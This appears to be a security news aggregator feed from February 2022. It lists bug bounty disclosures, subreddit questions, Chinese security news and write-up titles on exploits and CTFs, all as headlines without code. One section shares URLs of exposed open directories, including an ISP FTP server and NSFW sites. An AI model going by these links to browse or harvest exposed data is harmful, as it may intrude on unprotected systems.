  • Open

    Discoverability by phone number/email restriction bypass
    Twitter disclosed a bug submitted by zhirinovskiy: https://hackerone.com/reports/1439026 - Bounty: $5040
    Able to detect if a user is FetLife supporter although this user hides their support badge in fetlife.com/conversations/{id} JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1423704 - Bounty: $100
    Information Exposure Through Directory Listing vulnerability
    Nextcloud disclosed a bug submitted by technorat: https://hackerone.com/reports/1476709
  • Open

    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    🔥🔥 A new version 0.1.3 released for Kubesploit: a post-exploitation framework for Kubernetes🔥🔥
    submitted by /u/kubiscan [link] [comments]
    Retrieving Syscall ID with Hell's Gate, Halo's Gate, FreshyCalls and Syswhispers2
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-02-11 Review
    [HTB] Love Writeup by 0x584a PendingIntent重定向:一种针对安卓系统和流行App的通用提权方法 by ourren 自动机器学习的安全风险 by ourren 解构开源IAST 打造安全灰盒利器 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-11 Review
    [HTB] Love Writeup by 0x584a PendingIntent重定向:一种针对安卓系统和流行App的通用提权方法 by ourren 自动机器学习的安全风险 by ourren 解构开源IAST 打造安全灰盒利器 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 上海一程序员删库跑路被判10个月;500家电商网站被植入信用卡窃取程序
    一名29岁的程序员录某未经公司许可,在离职当天,私自将即将上线的京东到家平台系统代码全部删除。  ( 1 min )
    Fake dnSpy - 这鸡汤里下了毒!
    dnSpy是一款流行的用于调试、修改和反编译.NET程序的工具。网络安全研究人员在分析.NET程序或恶意软件时经常使用。  ( 1 min )
    黑客攻击欧洲港口石油设施致油价飙升、上海首份《企业数据合规指引》出台、微软计划收购网络安全公司|网络安全周报
    2022年2月7日至2月11日共收录全球网络安全热点8项,涉及微软、Mandiant、Puma、Swissport等。  ( 1 min )
    法国监管机构称谷歌分析存在数据隐私风险
    法国监管机构认为,该项服务在数据传输时没有采取足够的措施保障数据隐私权,可被美国情报机构利用。
    Kimsuky 正在使用 xRAT 进行窃密
    近日,ASEC 分析人员发现 Kimsuky 组织正在使用 xRAT(基于 Quasar RAT 定制的开源 RAT)恶意软件。  ( 1 min )
    Arid Viper APT 组织针对巴勒斯坦发起攻击
    Arid Viper 组织利用最初发布在土耳其国营通讯社 Anadolu 和巴勒斯坦 MAAN 发展中心的内容为诱饵,针对巴勒斯坦的机构发起攻击。  ( 1 min )
    FreeBuf周报 | 超50万人受Morley勒索软件攻击影响;黑客攻击欧洲港口石油设施
    商业服务公司Morley Companies披露了一起用户数据泄露事件,大量用户数据被窃取。  ( 1 min )
    浦发银行信用卡中心诚聘信息安全工程师
    上海浦东发展银行信用卡中心诚聘信息安全工程师。
    工信部就《工业和信息化领域数据安全管理办法(试行)》再次征求意见
    《管理办法》共八章四十一条,并强调重要数据和核心数据应按照相应法律、法规在境内存储,或依法依规进行数据出境安全评估。  ( 1 min )
    浅谈musl堆利用技巧(DEBUG篇)
    最近比赛出的musl题型的越来越多,不得不学习一波musl的堆利用来应对今后的比赛。  ( 1 min )
  • Open

    AppSec best practices for security that sticks
    In the complex and dynamic world of application security, best practices are your best friends. This post shows how you can build an effective AppSec program based on tried and tested workflows and tools for vulnerability testing and remediation. READ MORE  ( 6 min )

  • Open

    How to crack RSA-512 on off-the-shelf hardware in 4 days
    submitted by /u/ScottContini [link] [comments]
    Five Vulnerabilities Explained in Moxa MXview for OT Networks
    submitted by /u/h4ck3dit [link] [comments]
    Safer entropy accumulation in Linux 5.18's RNG
    submitted by /u/zx2c4 [link] [comments]  ( 1 min )
    what is Walkme Extension used for? I have it installed and enforced by default without ability to disable it - in all Chrome browsers on the work laptop...
    submitted by /u/One-World-One-Love [link] [comments]  ( 1 min )
    🇬🇧 Gaining the upper hand(le) - Hunting for privilege escalations and UAC bypasses by looking for leaked handles in unprivileged processes by @APTortellini and @last0x00
    submitted by /u/last0x00 [link] [comments]  ( 1 min )
    Firejail oopsie
    submitted by /u/MonkeeSage [link] [comments]
  • Open

    Fuzzing for XSS via nested parsers condition
    Article URL: https://swarm.ptsecurity.com/fuzzing-for-xss-via-nested-parsers-condition/ Comments URL: https://news.ycombinator.com/item?id=30292426 Points: 1 # Comments: 0  ( 5 min )
  • Open

    CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module Since 4.8
    Article URL: https://www.openwall.com/lists/oss-security/2022/02/10/1 Comments URL: https://news.ycombinator.com/item?id=30291958 Points: 2 # Comments: 0  ( 6 min )
  • Open

    MakerDAO Launches $10m Bug Bounty On Immunefi
    Immunefi has grown by leaps & bounds since we first launched in December 2020 and now protects over $100 billion (that’s Billion with a B)… Continue reading on Immunefi »  ( 2 min )
    Programming languages and Cybersecurity
    Codes are fundamental blocks of logic which drives businesses all around the world today. Continue reading on Medium »  ( 6 min )
    100 Days of Hacking - Day 6
    Objectives of day 6 : Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — Day 5
    Objectives of day 5 : Continue reading on Medium »  ( 1 min )
    Launching Superfluid Bug Bounty Program with Immunefi
    Our mission to establish the Superfluid Protocol as a key component of the financial rails of the future requires more than technological… Continue reading on Superfluid Blog »  ( 3 min )
    Buy any Products For Free From Bewakoof.com || Bug-Bounty $$
    Hi, Here we will see how you can buy any product for free from Bewakoof.com Continue reading on Medium »  ( 2 min )
    Internet-Wide Study: State Of SPF, DKIM, And DMARC — RedHunt Labs
    At RedHunt Labs, (under Project Resonance), we frequently conduct internet-wide research in different shapes and formats to understand the… Continue reading on Medium »  ( 7 min )
    كيف حصلت على 2500 دولار من اكتشاف الثغرات
    السلام عليكم ورحمة الله وبركاته Continue reading on Medium »  ( 1 min )
  • Open

    Are there only 2 types of people in this world? — An OSINT analysis
    Today as I was scrolling through my LinkedIn’s home feed I came across this image that had been liked by someone from my network. Continue reading on Medium »  ( 3 min )
    Cyberspace Vault Osint
    Task Continue reading on Medium »
  • Open

    [h1-2102] Information disclosure - ShopifyPlus add user displays existing Shopify ID fullname
    Shopify disclosed a bug submitted by francisbeaudoin: https://hackerone.com/reports/1083922 - Bounty: $1900
    Bypass For #997350 your-store.myshopify.com preview link is leak on third party website Via Online Store
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1015283 - Bounty: $500
    Password reset token leak via "Host header" on third party website
    Shopify disclosed a bug submitted by danishalkatiri: https://hackerone.com/reports/1092831
    Orders full read for a staff with only `Customers` permissions.
    Shopify disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1392032 - Bounty: $800
    Critically Sensitive Spring Boot Endpoints Exposed
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1022048 - Bounty: $5000
    Sending Arbitrary Requests through Jupyter Notebooks on gitlab.com and Self-Hosted GitLab Instances
    GitLab disclosed a bug submitted by iwis: https://hackerone.com/reports/970869 - Bounty: $1500
    Installing Gitlab runner with Docker-In-Docker allows root access
    GitLab disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1417211 - Bounty: $100
    Node.js Certificate Verification Bypass via String Injection
    Node.js disclosed a bug submitted by bengl: https://hackerone.com/reports/1429694
  • Open

    RCE vs Code Injection
    Hi, what's the difference between RCE and Code Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    What is the type of vulnerability called where you put the wrong file extension in the URL on a file that you shouldnt have access to?
    I accidentally discovered something like that during a very beginners CFT challenge. We were supposed to do an SQL injection to get a config file but I for some reason put config.php in the URL and got the file to the browser. I reported it to the people holding the CFT and they said they reported it to the maker of the serversoftware. I believe the software was opensource so it would be fun to find a note somewhere that they fixed it. That is why I wonder what this type of vulnerability is called. submitted by /u/HugoTRB [link] [comments]  ( 2 min )
    What’s your pentesting workbench?
    I am going to create a set of servers for pentest and I would like your suggestions/advice/comments. I would buy three servers , one for exploit dev /marvel analysis preferably a debian(kali or Ubuntu ) and other two for pentesting . submitted by /u/Sea_Finish6689 [link] [comments]  ( 3 min )
  • Open

    Email Forensics CTF Now Live
    Hello, folks! Our Email Forensics Capture The Flag Competition is now live! The event comprises weekly challenges for ten weeks. https://m.klr.co/kMhMA Good luck, and have fun! submitted by /u/MetaspikeHQ [link] [comments]  ( 1 min )
    Black screen and flashing cursor on boot when running SIFT Workstation in VirtualBox
    I'm not sure if this is the correct place to post, apologies if it isn't. I have downloaded the SIFT Workstation OVA file from Sans website and opened it in VirtualBox. I get a boot menu where I can either just start Ubuntu or run the memory test application. Choosing Ubuntu, I just get a black screen with a flashing underscore cursor in top left corner. It has been standing there for 10 minutes now and nothing happens. It never gets to the logon screen. I have seen others mention the issue when searching for it, but I haven't found any mentioned solutions. Any ideas? submitted by /u/kennethfinnerup [link] [comments]  ( 1 min )
    Question about $Ntuninstall files..
    So I was nosing around an old HDD that had XP installed , and I come across these folders in the WINDOWS directory. Inside them, there are files called “spuninst”. So I open them in notepad and there is a system.snapshot heading with a bunch of programs and such listed. My first question is- Is this every program that was installed at this particular moment in time on the computer? Is there way to see when past programs were installed and subsequently deleted if there are no files to look at creation dates? Thanks for any help submitted by /u/Pubh12 [link] [comments]  ( 1 min )
  • Open

    Social Engineering Basics: How to Win Friends and Infiltrate Businesses
    Technology changes and defenses get better, but some things stay the same—like human gullibility, which can be easily exploited through social engineering. What is social engineering? Social engineering, at its core, is taking advantage of human nature. Humans are innately trusting, often try to help, and want to avoid confrontation. A big facet of social... The post Social Engineering Basics: How to Win Friends and Infiltrate Businesses appeared first on TrustedSec.  ( 5 min )
  • Open

    Vulnerability Reward Program: 2021 Year in Review
    Article URL: https://security.googleblog.com/2022/02/vulnerability-reward-program-2021-year.html Comments URL: https://news.ycombinator.com/item?id=30289291 Points: 1 # Comments: 0  ( 12 min )
    Responding to and Learning from the Log4Shell Vulnerability
    Article URL: https://www.hsgac.senate.gov/hearings/responding-to-and-learning-from-the-log4shell-vulnerability Comments URL: https://news.ycombinator.com/item?id=30284252 Points: 1 # Comments: 0  ( 1 min )
  • Open

    SecWiki News 2022-02-10 Review
    Top 10 web hacking techniques of 2021 by ourren A Tale of DOM-based XSS! by ourren 利用RITA检测beacon通信 by ourren CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析 by ourren 企业面对APT化攻击的防御困境 by ourren CobaltStrike 区块链网络上线方式及检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-10 Review
    Top 10 web hacking techniques of 2021 by ourren A Tale of DOM-based XSS! by ourren 利用RITA检测beacon通信 by ourren CVE-2021-33742:Internet Explorer MSHTML堆越界写漏洞分析 by ourren 企业面对APT化攻击的防御困境 by ourren CobaltStrike 区块链网络上线方式及检测 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Lots of porn photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
    [NSFW} nastyflixxx.net
    http://www.nastyflixxx.net/clips/?C=S;O=A submitted by /u/mrcave81 [link] [comments]
    Some NOAA Hurricane Files
    https://www.nhc.noaa.gov/video/ Nothing really that interesting submitted by /u/420danger_noodle420 [link] [comments]
    FTP of a Russian ISP (Ufanet)
    You can find some good stuff in it I thinks ? http://ftp.ufanet.ru/ Url: http://ftp.ufanet.ru/ Urls file Extension (Top 5) Files Size .iso 363 384,42 GiB .xz 283 105,96 GiB .img 136 52,78 GiB .tar 16 647 29,78 GiB .bz2 112 29,21 GiB Dirs: 10 532 Ext: 188 Total: 24 123 Total: 664,74 GiB Date (UTC): 2022-02-10 01:01:31 Time: 00:03:28 Speed: 2,01 MB/s (16,1 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Some site's wp-content/uploads pages
    https://www.the8bitguy.com/wp-content/uploads/ ​ https://tomorrowcorporation.com/blog/wp-content/uploads/ submitted by /u/ilikemacsalot [link] [comments]
    Informatic related Stuff (In French)
    https://download.d-l.fr/apache_listing/ or https://download.d-l.fr (It's the same content but different UI ) http://s472165864.onlinehome.fr/anywarare/index.php?dir=| Url: https://download.d-l.fr/apache_listing/ Urls file Extension (Top 5) Files Size .iso 112 233,52 GiB .zip 101 24,71 GiB .exe 169 17,93 GiB .xz 7 4,65 GiB .1 1 4,4 GiB Dirs: 150 Ext: 46 Total: 572 Total: 296,05 GiB Date (UTC): 2022-02-10 00:55:22 Time: 00:00:35 Speed: 23,48 MB/s (187,8 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) Url: http://s472165864.onlinehome.fr/anywar... Urls file Extension (Top 5) Files Size .zip 808 69,32 GiB .iso 26 63,33 GiB .exe 604 60,11 GiB .001 2 6,6 GiB .002 2 6,4 GiB Dirs: 285 Ext: 23 Total: 1 868 Total: 212,62 GiB Date (UTC): 2022-02-10 00:59:03 Time: 00:00:09 Speed: Failed Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.0](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    Watch "Welcome to C0V3RT - Exploration of ALL THINGS "Covert Entry"" on YouTube
    submitted by /u/Can0pen3r [link] [comments]
    Dump Information for Process using GetTokenInformation
    In this post, you will get a very thorough step-by-step walkthrough on building your own process token dumper in the c++ which will help you in knowing your target better before launching another post exploitation attack. https://tbhaxor.com/dumping-token-information-in-windows/ submitted by /u/tbhaxor [link] [comments]
  • Open

    福利 | 缤纷优选,乐享元宵——来FB商城一起过节吧!
    2.14-2.17,来FB商城过元宵吧
    克隆版海盗湾网站正对数百万用户传播恶意广告
    据Cyber​​News安全研究人员发现,5个伪装成著名BT盗版资源网站海盗湾的恶意站点,每月向超过700万名用户提供恶意广告。  ( 1 min )
    《广东省公共数据安全管理办法(征求意见稿)》发布,强调公共数据的安全性
    《征求意见稿》共六章三十二条,加强数字政府公共数据安全管理,规范公共数据处理活动,促进数据资源有序开发利用,保护个人、组织的合法权益。
    记一次挖矿病毒的应急响应
    记一次挖矿病毒的应急响应  ( 1 min )
    小程序测试流程
    流程分为两个方面,解包可以挖掘信息泄露问题、隐藏的接口,抓包可以测试一些逻辑漏洞、API安全问题。  ( 1 min )
    Windows 11更新要小心了,恶意软件已经盯上它
    就在Windows 11系统广泛部署阶段,RedLine恶意软件团伙已经悄悄盯上了这波更新,已经做好了充足的攻击前准备。  ( 1 min )
    FreeBuf早报 | 英特尔发现16个与BIOS相关的新漏洞;海盗湾克隆针对数百万用户使用恶意软件
    CyberNews 的研究人员发现了五个海盗湾的克隆版本,每个月向超过 700 万用户提供恶意广告。  ( 1 min )
  • Open

    Custom Payloads로 ZAP 스캐닝 강화 🚀
    오늘은 제가 최근에 ZAP에서 약간 관심있게 보고있던 기능 하나를 소개해드릴까 합니다. 바로 Custom Payloads인데요. Fuzzer나 ZAP의 Scripting engine을 사용하지 않고 조금 더 쉽게 지정된 페이로드 기반으로 테스트를 할 수 있어서 알아두시면 보안 테스팅이나 자동화 구현에서 잘 사용하실 수 있을거란 생각이 듭니다. 그럼 시작해보죠 :D Custom Payloads Custom Payloads는 ZAP의 Active Scan, Passive Scan에서 사용자가 지정한 Payloads를 기반으로 사용할 수 있도록 제공해주는 기능이자 Addon입니다. 현재까진 2개의 카테고리를 사용할 수 있으며, 스캔에 붙어서 돌기 때문에 카테고리가 늘어날 수록 기능의 이점이 점점 커질거란 생각이 듭니다.

  • Open

    Is there a way to find out what server/ip adrdress a program accesses?
    I'm trying to find the server so I can ping to that manually but I don't know if that's possible. I'm almost a beginner in this, I want to know the pinging time. submitted by /u/Mayhem_8116 [link] [comments]  ( 1 min )
    Why is it common practice to reset a password after a few failed attempts?
    Hi Netsec people! Every once in a while I will get emails saying that some website/service I’m registered on has reset my password because of too many failed log in attempts. Now I’m not too surprised by the attempts, since according to HaveIBeenPwned, my credentials have been ‘exposed’ over 30 times in breaches dating back to the early 2010s. However, a while back I gave up my terrible practice of using 1 password across multiple services and migrated to using a password manager, and now all of my passwords to every service I’m on are randomly generated, so I’m not too worried by these attempts. My question is this: Why does the most common practice seem to be for services to reset your password after a few failed attempts? To me that seems like if x log in attempts failed, the password was robust/held up—why force the user to change it? If the user used a random generator, repeated tries that are time separated (I.e. wait 10min before trying again) probably won’t get an attacker anywhere. If a person isn’t using a password manager/generator then forcing the user to reset might actually lead them to use a weaker password since they will have to come up with something familiar, and there are only so many familiar items a person can keep track of at a time… I’d love to hear some insights on to why this reset after x tries approach appears to be such a pervasive (and counterintuitive) practice! Sorry if this isn’t the right place for a question like this! submitted by /u/KrishanuAR [link] [comments]  ( 2 min )
    Hosts making DNS queries to malicious site. How to dig deeper and find source?
    I have some infected hosts in LAN making a communication with C&C server and bots but that URL seems to be hidden behind Cloudflare CDN as per wireshark sniffing on infected host. In other words, I must say hosts are making DNS queries to malicious site. Our PAs with DNS filtering has blocked the domain since it flagged as malicious How I can find the source of infection on the host ? Any tools I can use which process or application making DNS queries ? Any advise how to dig deeper and what process is making these queries so we can get rid of these logs ? submitted by /u/techno_it [link] [comments]  ( 3 min )
    Does this report that Palestinian threat actor is behind new Mid East phishing attacks sound right?
    Known Palestinian threat actor MoleRats is likely behind a recent malicious email campaign targeting Middle Eastern governments, foreign-policy think tanks and a state-affiliated airline with a new intelligence-gathering trojan dubbed NimbleMamba, researchers said via Threatpost. https://threatpost.com/molerats-apt-trojan-cyberespionage-campaign/178305/ submitted by /u/Technical-Tea-4902 [link] [comments]  ( 1 min )
    RCE vs Command Injection
    Hi, what's the difference between RCE and Command Injection ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Setting up a security program
    So a long time ago some of the higher ups decided we should have a security program within our product development, the idea was that there would be one person in each scrum team responsible for promoting security and they would get some additional training to help with that. Like a lot of these central programs it continued for a few months and then was quickly forgotten about. Now I've been tasked with setting up our own version in the division as the central version is pretty much dead but they're still pushing the general idea. This is what is currently on my list - Security champions to be Security+ certified (I know it's a broad basic cert but I figure we can get funding for this and then progress to more advanced targeted training) - Add a method into Jira for tracking security related issues separately - Create discrete security projects as epics so we can fix some of the legacy issues completely and not worry about them anymore (current ideas for these include: removing third party services to reduce exposure, updating some very old libraries, updating SQL user security etc) Any other ideas of things I could introduce? submitted by /u/dbxp [link] [comments]  ( 3 min )
    CVSS calculation weight reasoning
    Hello AskNetsec. I was wondering if there is a resource describing the CVSS calculation reasoning. Not just how the CVSS is calculated by also the reasoning behind the weight of the different variables. For example in the specification (https://www.first.org/cvss/specification-document) under "CVSS v3.1 Equations", WHY is ISS = 6.42 * ISS? Where does 6.42 come from. Is there any research paper or whitepaper for this? submitted by /u/someuserman [link] [comments]  ( 1 min )
    Question patching build-in python on macOS
    Do I need to patch / install a new version of Python manually, in order to fix the vulnerability of Python on my macOS? For example, my macOS is upgraded to Monterey 12.1, but my Python version is still 3.7.9, which is vulnerable to CVE-2021-3177. I tried to search the vulnerability, say CVE-2021-3177 is that affected my version of macOS. However, Apple seems didn't put that information into their security update documentation. submitted by /u/20151124 [link] [comments]  ( 1 min )
  • Open

    npm weak links
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]
    New release of 🔥Kubesploit v0.1.3🔥
    submitted by /u/jat0369 [link] [comments]
    Top 10 web hacking techniques of 2021
    submitted by /u/albinowax [link] [comments]  ( 1 min )
    My SQLi adventure or: why you should make sure your WAF is configured properly
    submitted by /u/gsk-upxyz [link] [comments]
  • Open

    Is the Google Bucket Meant To Be Publicly Listable? https://cdn.shopify.com/shop-assets/
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102546 - Bounty: $500
    staffOrderNotificationSubscriptionDelete Could Be Used By Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102660 - Bounty: $500
    staffOrderNotificationSubscriptionCreate Is Not Blocked Entirely From Staff Member With Settings Permission
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1102652 - Bounty: $900
    Race condition in User comments Likes
    Zomato disclosed a bug submitted by 0xdexter: https://hackerone.com/reports/1409913 - Bounty: $150
    Reflected xss on ads.tiktok.com using `from` parameter.
    TikTok disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1452375 - Bounty: $6000
  • Open

    Coordinated vulnerability disclosure (CVD) for open source projects
    Article URL: https://github.blog/2022-02-09-coordinated-vulnerability-disclosure-cvd-open-source-projects/ Comments URL: https://news.ycombinator.com/item?id=30278015 Points: 1 # Comments: 0  ( 8 min )
  • Open

    Basic Web Technologies Knowledge required for starting with the web Exploitation Part 1
    Hello Guys Myself Manan Aggarwal BTech Student is here Present you the information about the Basic Technology which you need to require… Continue reading on Medium »  ( 4 min )
    Hacking with Rake
    Rake is a utility that can be used to automate tasks. For a example, if program needs to be set up in a certain way. Rake could be used to… Continue reading on Medium »
    How i made 15k$ from Remote Code Execution Vulnerability
    Hello Everyone 👋 Continue reading on Medium »  ( 1 min )
    How I hacked Google to read files from their servers for free!
    Hey Guys, This is Harish! I used to hunt to Microsoft and Google VRP, This is my first write up! Continue reading on Medium »  ( 1 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it. Continue reading on InfoSec Write-ups »  ( 3 min )
    QuickSwap’s New UI Alpha $50,000 Bug Bounty
    TL; DR: Continue reading on Medium »  ( 1 min )
    XDAG new version of wallet (0.4.0) officially released
    Repost of the 2011–11–05 news on xdag.io Continue reading on Medium »  ( 1 min )
    XDAG Mars Project
    repost of 2021–05–09 news on xdag.io Continue reading on Medium »  ( 4 min )
    XDAG Java Edition Testing Tutorial
    Hello to all, As some of you know, we are currently working on making the project more attractive to developers. Continue reading on Medium »  ( 2 min )
    Login function module: User Authentication .
    Input: User id and Password SQL: select * from admin where user_id = 'admin' and password=’****' Continue reading on Medium »
  • Open

    Introducing BloodHound 4.1 — The Three Headed Hound
    Prior Work Continue reading on Posts By SpecterOps Team Members »  ( 3 min )
    CRTO Review (Certified Red Team Operator)
    I had a certificate by successfully completing the CRTO exam in the past days, and while my knowledge was still fresh, I decided to write… Continue reading on Medium »  ( 4 min )
    Raspberry Pi Pico as a Rubber Ducky
    Kurulum Continue reading on Medium »  ( 1 min )
  • Open

    Top 10 Security Tips to Keep Your WordPress Site Healthy
    As we go through the winter months and whether changes, many of us go to our local pharmacy and take advantage of a flu shot. We do this because maybe we have had the flu before and the second of pain from the jab is nothing in comparison to the hours and days of sickness from catching the flu bug.  As everyone’s grandparents tell them, “An ounce of prevention is worth a pound of cure. Continue reading Top 10 Security Tips to Keep Your WordPress Site Healthy at Sucuri Blog.
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    RootMe | TryHackMe Walkthrough
    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    SecWiki News 2022-02-09 Review
    2022勒索软件和恶意软件报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-02-09 Review
    2022勒索软件和恶意软件报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Movies and TV-shows (Good speed)
    submitted by /u/lnsideMyHead [link] [comments]
    Anime and some Music
    submitted by /u/mingaminga [link] [comments]
    Index of /Johnny Cash CDs/
    submitted by /u/mingaminga [link] [comments]
    A lot of software, Games, Film and series in various language
    http://103.222.20.150/ftpdata/ Url: http://103.222.20.150/ftpdata/ Urls file Extension (Top 5) Files Size .mp4 12,912 11.59 TiB .mkv 9,042 9.3 TiB .avi 2,965 1.38 TiB .rar 21 36.18 GiB 16 19.15 GiB Dirs: 16,920 Ext: 59 Total: 46,363 Total: 22.4 TiB Date (UTC): 2022-02-08 23:34:44 Time: 01:48:31 Speed: 0.00 MB/s (0.0 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    CVE-2022–22718: Windows Print Spooler Privilege Escalation
    Article URL: https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81?gif=true Comments URL: https://news.ycombinator.com/item?id=30273774 Points: 3 # Comments: 1  ( 11 min )
    CVE-2022-21703: cross-origin request forgery against Grafana
    Article URL: https://jub0bs.com/posts/2022-02-08-cve-2022-21703-writeup/ Comments URL: https://news.ycombinator.com/item?id=30270751 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Simply GeoEstimation — OSINT Challenge 13
    On Dec 20, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 10
    In this article I will explain how to solve Hacktoria’s Geolocation 10 challenge. However, I must give a quick disclaimer first. I already… Continue reading on Medium »  ( 5 min )
  • Open

    Can deleted WhatsApp conversations from an iPhone be recovered without backup?
    I deleted a very important conversation on WhatsApp 2 days ago. The iPhone 12 (running iOS 15.x) in question has been powered off and hasn't been used since. I understand that WhatsApp saves a backup copy in Android phones' local memory everyday at 2am and erase them every 7 days, however I can't find anything about iOS devices. To make matter worse, I deleted the conversation around 7pm, so before the local backup could trigger at 2am. Is there any chance to get this conversation back without any backup? And what would my chances be with a Cellebrite device? submitted by /u/Strangedreamest [link] [comments]  ( 2 min )
  • Open

    信息安全技术 移动互联网应用程序(App)生命周期安全管理指南(征求意见稿)发布
    《征求意见稿》共六章,分别是范围、规范性引用文件、术语和定义、缩略语、概述和生命周期管理,对安全需求、安全建议、安全管理等给出了指导意见。
    FreeBuf早报 | “漫游螳螂”正瞄准欧洲;沃达丰葡萄牙分公司遭大规模网络攻击
